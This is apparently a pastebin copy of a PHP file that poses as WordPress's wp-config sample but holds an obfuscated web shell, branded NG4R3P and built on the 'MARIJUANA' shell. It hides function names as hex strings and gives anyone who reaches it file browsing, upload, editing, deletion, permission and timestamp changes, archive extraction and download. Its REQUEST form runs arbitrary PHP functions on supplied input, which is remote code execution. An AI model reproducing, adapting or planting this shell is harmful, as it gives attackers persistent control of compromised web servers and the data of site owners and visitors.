· 4 years ago · Apr 08, 2021, 12:30 PM
1// xpfgpfo.php
2
3<?php
4/**
5 * The base configuration for WordPress
6 *
7 * The wp-config.php creation script uses this file during the
8 * installation. You don't have to use the web site, you can
9 * copy this file to "wp-config.php" and fill in the values.
10 *
11 * This file contains the following configurations:
12 *
13 * * MySQL settings
14 * * Secret keys
15 * * Database table prefix
16 * * ABSPATH
17 *
18 * @link https://codex.wordpress.org/Editing_wp-config.php
19 *
20 * @package WordPress
21 */
22
23// ** MySQL settings - You can get this info from your web host ** //
24/** The name of the database for WordPress
25define( 'DB_NAME', 'database_name_here' );
26
27/** MySQL database username *
28define( 'DB_USER', 'username_here' );
29
30/** MySQL database password *
31define( 'DB_PASSWORD', 'password_here' );
32
33/** MySQL hostname *
34define( 'DB_HOST', 'localhost' );
35
36Database Charset to use in creating database tables. *
37define( 'DB_CHARSET', 'utf8' );
38
39The Database Collate type. Don't change this if in doubt. *
40define( 'DB_COLLATE', '' );
41
42/**#@+
43 * Authentication Unique Keys and Salts.
44 *
45 * Change these to different unique phrases!
46 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
47 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
48 *
49 * @since 2.6.0
50 *
51define( 'AUTH_KEY', 'put your unique phrase here' );
52define( 'SECURE_AUTH_KEY', 'put your unique phrase here' );
53define( 'LOGGED_IN_KEY', 'put your unique phrase here' );
54define( 'NONCE_KEY', 'put your unique phrase here' );
55define( 'AUTH_SALT', 'put your unique phrase here' );
56define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
57define( 'LOGGED_IN_SALT', 'put your unique phrase here' );
58define( 'NONCE_SALT', 'put your unique phrase here' );
59
60/**#@-*/
61
62/**
63 * WordPress Database Table prefix.
64 *
65 * You can have multiple installations in one database if you give each
66 * a unique prefix. Only numbers, letters, and underscores please!
67 */
68$table_prefix = 'wp_';
69/**
70 * For developers: WordPress debugging mode.
71 *
72 * Change this to true to enable the display of notices during development.
73 * It is strongly recommended that plugin and theme developers use WP_DEBUG
74 * in their development environments.
75 *
76 * For information on other constants that can be used for debugging,
77 * visit the Codex.
78 *
79 * @link https://codex.wordpress.org/Debugging_in_WordPress
80
81 define( 'WP_DEBUG', false );
82
83/* That's all, stop editing! Happy publishing. */
84
85/** Absolute path to the WordPress directory.
86if ( ! defined( 'ABSPATH' ) ) {
87 define( 'ABSPATH', dirname( __FILE__ ) . '/' );
88}
89
90/** Sets up WordPress vars and included files.
91 require_once( ABSPATH . 'wp-settings.php' );*/
92header("X-XSS-Protection: 0");ob_start();set_time_limit(0);error_reporting(0);ini_set('display_errors', FALSE);
93$Array = [
94 '7068705f756e616d65',
95 '70687076657273696f6e',
96 '6368646972',
97 '676574637764',
98 '707265675f73706c6974',
99 '636f7079',
100 '66696c655f6765745f636f6e74656e7473',
101 '6261736536345f6465636f6465',
102 '69735f646972',
103 '6f625f656e645f636c65616e28293b',
104 '756e6c696e6b',
105 '6d6b646972',
106 '63686d6f64',
107 '7363616e646972',
108 '7374725f7265706c616365',
109 '68746d6c7370656369616c6368617273',
110 '7661725f64756d70',
111 '666f70656e',
112 '667772697465',
113 '66636c6f7365',
114 '64617465',
115 '66696c656d74696d65',
116 '737562737472',
117 '737072696e7466',
118 '66696c657065726d73',
119 '746f756368',
120 '66696c655f657869737473',
121 '72656e616d65',
122 '69735f6172726179',
123 '69735f6f626a656374',
124 '737472706f73',
125 '69735f7772697461626c65',
126 '69735f7265616461626c65',
127 '737472746f74696d65',
128 '66696c6573697a65',
129 '726d646972',
130 '6f625f6765745f636c65616e',
131 '7265616466696c65',
132 '617373657274',
133];
134$___ = count($Array);
135for($i=0;$i<$___;$i++) {
136 $GNJ[] = uhex($Array[$i]);
137}
138?>
139<!DOCTYPE html>
140 <html dir="auto" lang="en-US">
141
142 <link rel="icon" href="//0x5a455553.github.io/MARIJUANA/icon.png" />
143 <link rel="stylesheet" href="//0x5a455553.github.io/MARIJUANA/main.css" type="text/css">
144
145 <script src="//ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
146 <script src="//cdnjs.cloudflare.com/ajax/libs/notify/0.4.2/notify.min.js"></script>
147 </head>
148
149 <body>
150 <header>
151 <div class="y x">
152 <a class="ajx" href="<?php echo basename($_SERVER['PHP_SELF']);?>">
153 NG4R3P
154 </a>
155 </div>
156
157 <div class="q x w">
158
159 </div>
160
161 </header>
162
163 <article>
164 <div class="i">
165 <i class="far fa-hdd"></i>
166 <?php echo $GNJ[0]();?>
167
168 <br />
169
170 <i class="far fa-lightbulb"></i>   <b>SOFT :</b> <?php echo $_SERVER['SERVER_SOFTWARE'];?> <b>PHP :</b> <?php echo $GNJ[1]();?>
171
172 <br />
173
174 <i class="far fa-folder"></i>
175
176 <?php
177 if(isset($_GET["d"])) {
178 $d = uhex($_GET["d"]);
179 $GNJ[2](uhex($_GET["d"]));
180 }
181 else {
182 $d = $GNJ[3]();
183 }
184 $k = $GNJ[4]("/(\\\|\/)/", $d );
185 foreach ($k as $m => $l) {
186 if($l=='' && $m==0) {
187 echo '<a class="ajx" href="?d=2f">/</a>';
188 }
189 if($l == '') {
190 continue;
191 }
192 echo '<a class="ajx" href="?d=';
193 for ($i = 0; $i <= $m; $i++) {
194 echo hex($k[$i]);
195 if($i != $m) {
196 echo '2f';
197 }
198 }
199 echo '">'.$l.'</a>/';
200 }
201 ?>
202
203 <br />
204
205 </div>
206
207 <div class="u">
208 <?php echo $_SERVER['SERVER_ADDR'];?> <i class="fas fa-link"></i>
209 <br />
210
211 <br />
212
213 <form method="post" enctype="multipart/form-data">
214 <label class="l w">
215 <input type="file" name="n[]" onchange="this.form.submit()" multiple> UPLOAD
216 </label>
217 </form>
218
219 <?php
220 $o_ = [
221 '<script>$.notify("',
222 '", { className:"1",autoHideDelay: 2000,position:"left bottom" });</script>'
223 ];
224 $f = $o_[0].'OK!'.$o_[1];
225 $g = $o_[0].'ER!'.$o_[1];
226 if(isset($_FILES["n"])) {
227 $z = $_FILES["n"]["name"];
228 $r = count($z);
229 for( $i=0 ; $i < $r ; $i++ ) {
230 if($GNJ[5]($_FILES["n"]["tmp_name"][$i], $z[$i])) {
231 echo $f;
232 }
233 else {
234 echo $g;
235 }
236 }
237 }
238 ?>
239
240 </div>
241 <?php
242 $a_ = '<table cellspacing="0" cellpadding="7" width="100%">
243 <thead>
244 <tr>
245 <th>';
246 $b_ = '</th>
247 </tr>
248 </thead>
249 <tbody>
250 <tr>
251 <td></td>
252 </tr>
253 <tr>
254 <td class="x">';
255 $c_ = '</td>
256 </tr>
257 </tbody>
258 </table>';
259 $d_ = '<br />
260 <br />
261 <input type="submit" class="w" value=" OK " />
262 </form>';
263 if(isset($_GET["s"])) {
264 echo $a_.uhex($_GET["s"]).$b_.'
265 <textarea readonly="yes">'.$GNJ[15]($GNJ[6](uhex($_GET["s"]))).'</textarea>
266 <br />
267 <br />
268 <input onclick="location.href=\'?d='.$_GET["d"].'&e='.$_GET["s"].'\'" type="submit" class="w" value=" EDIT " />
269 '.$c_;
270 }
271 elseif(isset($_GET["y"])) {
272 echo $a_.'REQUEST'.$b_.'
273 <form method="post">
274 <input class="x" type="text" name="1" />
275 <input class="x" type="text" name="2" />
276 '.$d_.'
277 <br />
278 <textarea readonly="yes">';
279
280 if(isset($_POST["2"])) {
281 echo $GNJ[15](dre($_POST["1"], $_POST["2"]));
282 }
283
284 echo '</textarea>
285 '.$c_;
286 }
287 elseif(isset($_GET["e"])) {
288 echo $a_.uhex($_GET["e"]).$b_.'
289 <form method="post">
290 <textarea name="e" class="o">'.$GNJ[15]($GNJ[6](uhex($_GET["e"]))).'</textarea>
291 <br />
292 <br />
293 <span class="w">BASE64</span> :
294 <select id="b64" name="b64">
295 <option value="0">NO</option>
296 <option value="1">YES</option>
297 </select>
298 '.$d_.'
299 '.$c_.'
300
301 <script>
302 $("#b64").change(function() {
303 if($("#b64 option:selected").val() == 0) {
304 var X = $("textarea").val();
305 var Z = atob(X);
306 $("textarea").val(Z);
307 }
308 else {
309 var N = $("textarea").val();
310 var I = btoa(N);
311 $("textarea").val(I);
312 }
313 });
314 </script>';
315 if(isset($_POST["e"])) {
316 if($_POST["b64"] == "1") {
317 $ex = $GNJ[7]($_POST["e"]);
318 }
319 else {
320 $ex = $_POST["e"];
321 }
322 $fp = $GNJ[17](uhex($_GET["e"]), 'w');
323 if($GNJ[18]($fp, $ex)) {
324 OK();
325 }
326 else {
327 ER();
328 }
329 $GNJ[19]($fp);
330 }
331 }
332 elseif(isset($_GET["x"])) {
333 rec(uhex($_GET["x"]));
334 if($GNJ[26](uhex($_GET["x"]))) {
335 ER();
336 }
337 else {
338 OK();
339 }
340
341 }
342 elseif(isset($_GET["t"])) {
343 echo $a_.uhex($_GET["t"]).$b_.'
344 <form action="" method="post">
345 <input name="t" class="x" type="text" value="'.$GNJ[20]("Y-m-d H:i", $GNJ[21](uhex($_GET["t"]))).'">
346 '.$d_.'
347 '.$c_;
348 if( !empty($_POST["t"]) ) {
349 $p = $GNJ[33]($_POST["t"]);
350 if($p) {
351 if(!$GNJ[25](uhex($_GET["t"]),$p,$p)) {
352 ER();
353 }
354 else {
355 OK();
356 }
357 }
358 else {
359 ER();
360 }
361 }
362 }
363 elseif(isset($_GET["k"])) {
364 echo $a_.uhex($_GET["k"]).$b_.'
365 <form action="" method="post">
366 <input name="b" class="x" type="text" value="'.$GNJ[22]($GNJ[23]('%o', $GNJ[24](uhex($_GET["k"]))), -4).'">
367 '.$d_.'
368 '.$c_;
369 if(!empty($_POST["b"])) {
370 $x = $_POST["b"];
371 $t = 0;
372 for($i=strlen($x)-1;$i>=0;--$i)
373 $t += (int)$x[$i]*pow(8, (strlen($x)-$i-1));
374 if(!$GNJ[12](uhex($_GET["k"]), $t)) {
375 ER();
376 }
377 else {
378 OK();
379 }
380 }
381 }
382 elseif(isset($_GET["l"])) {
383 echo $a_.'+DIR'.$b_.'
384 <form action="" method="post">
385 <input name="l" class="x" type="text" value="">
386 '.$d_.'
387 '.$c_;
388 if(isset($_POST["l"])) {
389 if(!$GNJ[11]($_POST["l"])) {
390 ER();
391 }
392 else {
393 OK();
394 }
395 }
396 }
397 elseif(isset($_GET["q"])) {
398 if($GNJ[10](__FILE__)) {
399 $GNJ[38]($GNJ[9]);
400 header("Location: ".basename($_SERVER['PHP_SELF'])."");
401 exit();
402 }
403 else {
404 echo $g;
405 }
406 }
407 elseif(isset($_GET["n"])) {
408 echo $a_.'+FILE'.$b_.'
409 <form action="" method="post">
410 <input name="n" class="x" type="text" value="">
411 '.$d_.'
412 '.$c_;
413 if(isset($_POST["n"])) {
414 if(!$GNJ[25]($_POST["n"])) {
415 ER();
416 }
417 else {
418 OK();
419 }
420 }
421 }
422 elseif(isset($_GET["r"])) {
423 echo $a_.uhex($_GET["r"]).$b_.'
424 <form action="" method="post">
425 <input name="r" class="x" type="text" value="'.uhex($_GET["r"]).'">
426 '.$d_.'
427 '.$c_;
428 if(isset($_POST["r"])) {
429 if($GNJ[26]($_POST["r"])) {
430 ER();
431 }
432 else {
433 if($GNJ[27](uhex($_GET["r"]), $_POST["r"])) {
434 OK();
435 }
436 else {
437 ER();
438 }
439 }
440 }
441 }
442 elseif(isset($_GET["z"])) {
443 $zip = new ZipArchive;
444 $res = $zip->open(uhex($_GET["z"]));
445 if($res === TRUE) {
446 $zip->extractTo(uhex($_GET["d"]));
447 $zip->close();
448 OK();
449 } else {
450 ER();
451 }
452 }
453 else {
454 echo '<table cellspacing="0" cellpadding="7" width="100%">
455 <thead>
456 <tr>
457 <th width="44%">[ NAME ]</th>
458 <th width="11%">[ SIZE ]</th>
459 <th width="17%">[ PERM ]</th>
460 <th width="17%">[ DATE ]</th>
461 <th width="11%">[ ACT ]</th>
462 </tr>
463 </thead>
464 <tbody>
465 <tr>
466 <td>
467 <a class="ajx" href="?d='.hex($d).'&n">+FILE</a>
468 <a class="ajx" href="?d='.hex($d).'&l">+DIR</a>
469 </td>
470 </tr>
471 ';
472
473 $h = "";
474 $j = "";
475 $w = $GNJ[13]($d);
476 if($GNJ[28]($w) || $GNJ[29]($w)) {
477 foreach($w as $c){
478 $e = $GNJ[14]("\\", "/", $d);
479 if(!$GNJ[30]($c, ".zip")) {
480 $zi = '';
481 }
482 else {
483 $zi = '<a href="?d='.hex($e).'&z='.hex($c).'">U</a>';
484 }
485 if($GNJ[31]("$d/$c")) {
486 $o = "";
487 }
488 elseif(!$GNJ[32]("$d/$c")) {
489 $o = " h";
490 }
491 else {
492 $o = " w";
493 }
494 $s = $GNJ[34]("$d/$c") / 1024;
495 $s = round($s, 3);
496 if($s>=1024) {
497 $s = round($s/1024, 2) . " MB";
498 } else {
499 $s = $s . " KB";
500 }
501 if(($c != ".") && ($c != "..")){
502 ($GNJ[8]("$d/$c")) ?
503 $h .= '<tr class="r">
504 <td>
505 <i class="far fa-folder m"></i>
506 <a class="ajx" href="?d='.hex($e).hex("/".$c).'">'.$c.'</a>
507 </td>
508 <td class="x">
509 dir
510 </td>
511 <td class="x">
512 <a class="ajx'.$o.'" href="?d='.hex($e).'&k='.hex($c).'">'.x("$d/$c").'</a>
513 </td>
514 <td class="x">
515 <a class="ajx" href="?d='.hex($e).'&t='.hex($c).'">'.$GNJ[20]("Y-m-d H:i", $GNJ[21]("$d/$c")).'</a>
516 </td>
517 <td class="x">
518 <a class="ajx" href="?d='.hex($e).'&r='.hex($c).'">R</a>
519 <a href="?d='.hex($e).'&x='.hex($c).'">D</a>
520 </td>
521 </tr>
522
523 '
524 :
525 $j .= '<tr class="r">
526 <td>
527 <i class="far fa-file m"></i> 
528 <a class="ajx" href="?d='.hex($e).'&s='.hex($c).'">'.$c.'</a>
529 </td>
530 <td class="x">
531 '.$s.'
532 </td>
533 <td class="x">
534 <a class="ajx'.$o.'" href="?d='.hex($e).'&k='.hex($c).'">'.x("$d/$c").'</a>
535 </td>
536 <td class="x">
537 <a class="ajx" href="?d='.hex($e).'&t='.hex($c).'">'.$GNJ[20]("Y-m-d H:i", $GNJ[21]("$d/$c")).'</a>
538 </td>
539 <td class="x">
540 <a class="ajx" href="?d='.hex($e).'&r='.hex($c).'">R</a>
541 <a class="ajx" href="?d='.hex($e).'&e='.hex($c).'">E</a>
542 <a href="?d='.hex($e).'&g='.hex($c).'">G</a>
543 '.$zi.'
544 <a href="?d='.hex($e).'&x='.hex($c).'">D</a>
545 </td>
546 </tr>
547
548 ';
549
550 }
551 }
552 }
553
554 echo $h;
555 echo $j;
556 echo '</tbody>
557 <tfoot>
558 <tr>
559 <th class="et">
560 <a class="ajx" href="?d='.hex($e).'&y">REQUEST</a>
561 <a href="?d='.hex($e).'&q">EXIT</a>
562 </th>
563 <th class="et" width="11%"></th>
564 <th class="et" width="17%"></th>
565 <th class="et" width="17%"></th>
566 <th class="et" width="11%"></th>
567 </tr>
568 </tfoot>
569 </table>';
570 }
571 ?>
572
573 </article>
574 <footer class="x">
575
576 </footer>
577 <?php
578 if(isset($_GET["1"])) {
579 echo $f;
580 }
581 elseif(isset($_GET["0"])) {
582 echo $g;
583 }
584 else {
585 NULL;
586 }
587 ?>
588
589 <script>
590 $(".ajx").click(function(t){t.preventDefault();var e=$(this).attr("href");history.pushState("","",e),$.get(e,function(t){$("body").html(t)})});
591 </script>
592 </body>
593 </html>
594<?php
595 function rec($j) {
596 global $GNJ;
597 if(trim(pathinfo($j, PATHINFO_BASENAME ), '.') === '') {
598 return;
599 }
600 if($GNJ[8]($j)) {
601 array_map('rec', glob($j . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT));
602 $GNJ[35]($j);
603 }
604 else {
605 $GNJ[10]($j);
606 }
607 }
608 function dre($y1, $y2) {
609 global $GNJ;
610 ob_start();
611 $GNJ[16]($y1($y2));
612 return $GNJ[36]();
613 }
614 function hex($n) {
615 $y='';
616 for ($i=0; $i < strlen($n); $i++){
617 $y .= dechex(ord($n[$i]));
618 }
619 return $y;
620 }
621 function uhex($y) {
622 $n='';
623 for ($i=0; $i < strlen($y)-1; $i+=2){
624 $n .= chr(hexdec($y[$i].$y[$i+1]));
625 }
626 return $n;
627 }
628 function OK() {
629 global $GNJ, $d;
630 $GNJ[38]($GNJ[9]);
631 header("Location: ?d=".hex($d)."&1");
632 exit();
633 }
634 function ER() {
635 global $GNJ, $d;
636 $GNJ[38]($GNJ[9]);
637 header("Location: ?d=".hex($d)."&0");
638 exit();
639 }
640 function x($c) {
641 global $GNJ;
642 $x = $GNJ[24]($c);
643 if(($x & 0xC000) == 0xC000) {
644 $u = "s";
645 }
646 elseif(($x & 0xA000) == 0xA000) {
647 $u = "l";
648 }
649 elseif(($x & 0x8000) == 0x8000) {
650 $u = "-";
651 }
652 elseif(($x & 0x6000) == 0x6000) {
653 $u = "b";
654 }
655 elseif(($x & 0x4000) == 0x4000) {
656 $u = "d";
657 }
658 elseif(($x & 0x2000) == 0x2000) {
659 $u = "c";
660 }
661 elseif(($x & 0x1000) == 0x1000) {
662 $u = "p";
663 }
664 else {
665 $u = "u";
666 }
667 $u .= (($x & 0x0100) ? "r" : "-");
668 $u .= (($x & 0x0080) ? "w" : "-");
669 $u .= (($x & 0x0040) ? (($x & 0x0800) ? "s" : "x") : (($x & 0x0800) ? "S" : "-"));
670 $u .= (($x & 0x0020) ? "r" : "-");
671 $u .= (($x & 0x0010) ? "w" : "-");
672 $u .= (($x & 0x0008) ? (($x & 0x0400) ? "s" : "x") : (($x & 0x0400) ? "S" : "-"));
673 $u .= (($x & 0x0004) ? "r" : "-");
674 $u .= (($x & 0x0002) ? "w" : "-");
675 $u .= (($x & 0x0001) ? (($x & 0x0200) ? "t" : "x") : (($x & 0x0200) ? "T" : "-"));
676 return $u;
677 }
678 if(isset($_GET["g"])) {
679 $GNJ[38]($GNJ[9]);
680 header("Content-Type: application/octet-stream");
681 header("Content-Transfer-Encoding: Binary");
682 header("Content-Length: ".$GNJ[34](uhex($_GET["g"])));
683 header("Content-disposition: attachment; filename=\"".uhex($_GET["g"])."\"");
684 $GNJ[37](uhex($_GET["g"]));
685 }
686?>